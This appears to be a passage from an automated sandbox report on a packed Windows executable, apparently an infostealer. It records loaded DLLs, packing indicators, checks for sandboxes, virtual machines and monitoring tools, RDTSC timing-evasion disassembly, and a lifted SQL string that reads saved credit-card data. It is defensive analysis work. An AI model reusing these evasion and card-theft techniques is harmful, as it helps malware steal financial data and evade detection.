              Source: file.exe, 00000000.00000002.2081679058.00000000013DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards;
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1840128 > 1048576
              Source: file.exeStatic PE information: Raw size of sqwnkuay is bigger than: 0x100000 < 0x1a7400

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.120000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sqwnkuay:EW;dlrscmkp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sqwnkuay:EW;dlrscmkp:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001468F0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001468F0
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1ce583 should be: 0x1c9bf3
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: sqwnkuay
              Source: file.exeStatic PE information: section name: dlrscmkp
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055E055 push 5D2BB893h; mov dword ptr [esp], edi0_2_0055E0B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059105A push edi; mov dword ptr [esp], 5125D435h0_2_005910A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054A84A push ecx; mov dword ptr [esp], 21BF876Ah0_2_0054A8A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054A84A push 4BCB2200h; mov dword ptr [esp], edi0_2_0054A8C5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0039D826 push ebx; mov dword ptr [esp], 0BD5F953h0_2_0039D860
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005BD07A push 7E3D28EFh; mov dword ptr [esp], ebx0_2_005BD0DC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058B00B push ecx; mov dword ptr [esp], esi0_2_0058B04B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051680B push 208F5800h; mov dword ptr [esp], edx0_2_00516869
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051680B push esi; mov dword ptr [esp], ebx0_2_00516877
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051680B push eax; mov dword ptr [esp], ebp0_2_0051689B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051680B push ebx; mov dword ptr [esp], eax0_2_005168F3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005AE033 push edx; mov dword ptr [esp], ebp0_2_005AE059
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005AE033 push 1FA75021h; mov dword ptr [esp], esp0_2_005AE061
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FA021 push edi; mov dword ptr [esp], 5CFC5FC0h0_2_005FA071
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FA021 push edi; mov dword ptr [esp], edx0_2_005FA0D2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DB8B5 push esi; mov dword ptr [esp], ebp0_2_003DB8E3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DB8B5 push 16DFF2F6h; mov dword ptr [esp], ecx0_2_003DB9E4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DB8B5 push edi; mov dword ptr [esp], 5ACEF69Eh0_2_003DB9F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DB8B5 push ebp; mov dword ptr [esp], ebx0_2_003DBA57
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DB8B5 push 56536839h; mov dword ptr [esp], ecx0_2_003DBAF5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DB8B5 push edx; mov dword ptr [esp], esp0_2_003DBB06
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005698C7 push ebx; mov dword ptr [esp], 5DDDE856h0_2_005698F2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005698C7 push 395424EFh; mov dword ptr [esp], eax0_2_005699BA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005698C7 push eax; mov dword ptr [esp], ebx0_2_00569A14
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005698C7 push 347CC05Dh; mov dword ptr [esp], eax0_2_00569A44
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005698C7 push ebx; mov dword ptr [esp], 6D029486h0_2_00569AB0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005698C7 push 2884809Ch; mov dword ptr [esp], eax0_2_00569AC7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005698C7 push 2B4FD541h; mov dword ptr [esp], ebx0_2_00569AF5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F50D6 push 596EBC39h; mov dword ptr [esp], edx0_2_004F555F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005BA0B8 push 741A0D23h; mov dword ptr [esp], ecx0_2_005BA20C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047A8AB push ebx; mov dword ptr [esp], ecx0_2_0047A9DD
              Source: file.exeStatic PE information: section name: sqwnkuay entropy: 7.954864550900061

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001468F0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001468F0

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-27860
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ECAC2 second address: 4ECAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F38F8 second address: 4F38FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F38FF second address: 4F3931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edi 0x0000000b pushad 0x0000000c jmp 00007F2B9CB0EC0Bh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F2B9CB0EC15h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3931 second address: 4F3941 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007F2B9CBCE6A6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3A9E second address: 4F3AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3AA2 second address: 4F3AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F407A second address: 4F4080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6C9F second address: 4F6CB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2B9CBCE6AFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6CB3 second address: 4F6CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jne 00007F2B9CB0EC0Ch 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D1B82h], esi 0x00000015 push 00000000h 0x00000017 movsx edi, ax 0x0000001a push 81A1353Bh 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F2B9CB0EC13h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6E7F second address: 4F6ECB instructions: 0x00000000 rdtsc 0x00000002 je 00007F2B9CBCE6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F2B9CBCE6A8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 jmp 00007F2B9CBCE6B6h 0x0000001a jmp 00007F2B9CBCE6AEh 0x0000001f popad 0x00000020 mov eax, dword ptr [esp+04h] 0x00000024 jns 00007F2B9CBCE6B4h 0x0000002a push eax 0x0000002b push edx 0x0000002c jnp 00007F2B9CBCE6A6h 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6FEC second address: 4F6FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6FF5 second address: 4F7014 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F2B9CBCE6AEh 0x00000010 mov eax, dword ptr [eax] 0x00000012 push ebx 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516A6A second address: 516A70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5149BF second address: 5149CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5149CD second address: 5149D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514D22 second address: 514D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51510C second address: 515113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515277 second address: 51527B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51527B second address: 515281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515281 second address: 515287 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515287 second address: 51528D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515614 second address: 515634 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F2B9CBCE6B5h 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515A82 second address: 515A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515A86 second address: 515A94 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2B9CBCE6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515A94 second address: 515A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515A98 second address: 515AAC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnl 00007F2B9CBCE6A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515AAC second address: 515ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2B9CB0EC0Ch 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9591 second address: 4E9597 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9597 second address: 4E95C0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F2B9CB0EC19h 0x00000010 push ecx 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E95C0 second address: 4E95D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 js 00007F2B9CBCE6A6h 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515BE0 second address: 515BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B9CB0EC15h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515BFE second address: 515C33 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2B9CBCE6A6h 0x00000008 jmp 00007F2B9CBCE6AFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2B9CBCE6B9h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5163BC second address: 5163C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5163C2 second address: 5163C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516540 second address: 51654D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518686 second address: 51868A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518D76 second address: 518D7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518D7C second address: 518D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519F05 second address: 519F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51DB5A second address: 51DB60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51DB60 second address: 51DB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523112 second address: 523118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5226D4 second address: 5226E6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2B9CB0EC06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5226E6 second address: 5226EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52281B second address: 52285D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B9CB0EC0Fh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F2B9CB0EC13h 0x00000010 jmp 00007F2B9CB0EC0Ah 0x00000015 jmp 00007F2B9CB0EC0Ah 0x0000001a popad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52285D second address: 52286C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52286C second address: 522870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522E3A second address: 522E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524F67 second address: 524FC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F2B9CB0EC06h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 6359BB7Bh 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F2B9CB0EC08h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f jl 00007F2B9CB0EC12h 0x00000035 jmp 00007F2B9CB0EC0Ch 0x0000003a call 00007F2B9CB0EC09h 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 jnl 00007F2B9CB0EC06h 0x00000048 pop eax 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524FC2 second address: 524FC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524FC7 second address: 524FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524FCD second address: 524FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edi 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524FE6 second address: 524FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524FEA second address: 524FFD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2B9CBCE6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jns 00007F2B9CBCE6A6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
